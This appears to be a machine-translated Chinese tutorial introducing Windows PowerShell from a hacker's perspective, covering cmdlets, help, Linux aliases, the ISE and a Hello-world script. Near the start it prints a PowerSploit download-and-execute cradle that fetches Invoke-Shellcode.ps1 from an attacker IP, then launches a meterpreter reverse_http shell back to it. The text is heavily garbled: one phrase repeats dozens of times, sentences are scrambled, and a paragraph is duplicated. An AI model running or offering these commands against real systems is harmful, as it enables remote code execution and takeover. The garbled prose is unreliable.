win7脚本编写 (win7 脚本)

我坚信你需要精通成为一个真正的职业黑客 Linux。原因很多。

大多数黑客工具都是 Linux (超过 90%)。

Linux 为我们提供更大粒度的控制。

Linux 中间终端使我们能够完全控制操作系统 Windows 中的 cmd.exe 功能有限。

最重要的是,Linux 开源透明。

这意味着我们实际上可以看到源代码,在很大程度上比封闭源和不透明Windows操作系统更大程度地操作操作系统。

近年来,微软似乎承认了Linux命令行和终端的优势。他们现在似乎理解了命令行的优势和优势,并引入了它作为回应 Windows PowerShell。



PowerShell 背景

早在 1990 在这个时代,微软已经意识到了他们 cmd.exe 限制,并试图用一堆灵活的方法来解决它。2002 年,Microsoft 关于正在开发的产品的白皮书被称为 MONAD,或 Microsoft Shell。最终,Windows PowerShell 在 2007 年作为附加组件发布,Windows PowerShell 2.0 完全集成到 Windows 7 和 Windows Server 2008 以及之后的一切 Windows 在操作系统中。

Windows PowerShell 从 Linux 环境借鉴了很多内容,包括很多 Linux 命令。它还包括将命令和链接命令连接到脚本的能力。

有了 PowerShell 能力,Windows 在微软开源其源代码之前,它已经成为一个更强大的黑客平台,Linux 操作系统仍将是黑客的首选。

另一方面,目标Windows 系统上的 PowerShell 可用于使用或破坏。例如,这些 PowerShell 命令用于 PowerSploit 漏洞利用;

PS>IEX(New-Object Net.WebClient).DownloadString("http://192.168.181.128:8000/CodeExecution/Invoke-Shellcode.ps1")

PS > Invoke-Shellcode -Payload windows/meterpreter/reverse_http -lhost 192.168.181.128 -lport 4444 -Force

我的观点很简单,Powershell 对 Windows 管理员是一个很好的工具,但它为黑客增加了攻击向量。所以,你应该熟悉它。所以,你应该熟悉它。

Cmdlet

Windows PowerShell 和 Linux 中的 BASH shell 主要区别之一是 Microsoft 为 PowerShell 开发了 cmdlet(command-let)。它们 cmdlet 本质上数的单个命令本质上是完成有时更复杂的任务。这些 cmdlet 以动词名词的形式,如get-help”。

第 1 步:打开 Powershell

许多系统管理员和用户并不熟悉 Windows GUI 下面隐藏着一个强大的工具和引擎来操作 Windows。你可以通过开始或开始Windows在按钮的搜索窗口中键入powershell”并单击“PowerShell访问它。

当它打开时,你应该看到下面显示的屏幕。

第 2 步骤:得到帮助

我们打开 PowerShell 终端,我们首先要探索的是如何获得帮助。PowerShell 有一个叫不出所料get-help”的 cmdlet。

当我们输入当我们输入当我们输入当我们输入当我们输入输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入当我们输入get-help当我们收到类似上面的帮助屏幕时。Microsoft 为这个 cmdlet 将别名设置为help”和 Linux 命令“man完成相同的操作

第 3 步骤:上下文相关帮助

正如您在Linux你可以在命令前添加关键字man”来查看 Linux 手册页中有任何命令。同样,在 Windows PowerShell 你可以用中get-help”后跟 cmdlet 查看手册页。让我们得到名字叫Write-Output”的 cmdlet 的手册页。

PS > get-help Write-Output

在上面看到 PowerShell 返回 cmdlet 的手册页“Write-Output”。正如我上面提到的,man”和“help同一上下文相关信息将被提取。

第 4 步:运行与 Linux 相同的命令

微软认识到 Linux 系统管理员更习惯于从命令中工作,鼓励他们使用和使用 PowerShell,他们会有很多最常见的 Linux 命令别名为 PowerShell。

PowerShell 一些可用的 Linux 命令包括但不限于以下内容。

·grep

·cat

·ps

·mv

·rm

·echo

·pwd

·kill

·export

·cp

·pwd

以下列表包括许多最常用的列表 cmdlet 及其在 cmd.exe 和 Linux/UNIX 中的别名。

很多时候,这些 PowerShell cmd-let 看起来比 Linux 或者别名命令有点笨拙。

很多时候,这些 PowerShell cmd-let 看起来比 Linux 或者别名命令有点笨拙。cmd.exe 中的“dir”命令或 Linux 中的“ls”命令在 PowerShell 中是“Get-Childitem”。

第 5 步骤:使用集成脚本环境

要在 PowerShell 类似于中创脚本 Linux,例如,您可以使用记事本或其他文本编辑器 Notepad 。此外,PowerShell 附带一个我们可以使用的集成脚本环境 (ISE)。

进入 ISE 有很多方法,但最简单的方法可能是转到搜索窗口并输入Powershell”。除了 PowerShell 除了环境,你还可以选择 PowerShell ISE。

这将打开 PowerShell ISE,如下所示。

第 6 步:Hello Hackers-Arise!

当你开始使用任何编程语言时,你需要到处写Hello World我们将在这里创建自己的程序Hello Hackers-Arise”脚本。

打开 ISE 之后,我们可以键入:

写输出“Hello Hackers-Arise!”

就像在 Linux 在终端中,我们将字符串Hello World包括在双引号中,表示我们想输出字符串文本(这意味着我们想要这些人类语言单词,而不是计算机命令)。

然后我们可以单击绿色执行按钮操作脚本,输出将出现在中间屏幕上,如上图所示。

然后,我们可以通过转到文件菜单并选择保存来保存脚本。当您这样做时,它会提示您输入文件名并将其保存为 .ps1 文件扩展名。

我们可以打开它 Hello Hackers-Arise.ps1 的 PowerShell 当脚本打开时,环境或单击 ISE 用绿色箭头操作这个脚本。我们刚刚知道 PowerShell 我们能做什么,我们创建了一个简单的单行脚本,但在未来的教程中,我们将从攻击者的角度进行深入的研究 PowerShell 的功能。我们将使用 PowerShell 开发端口扫描器。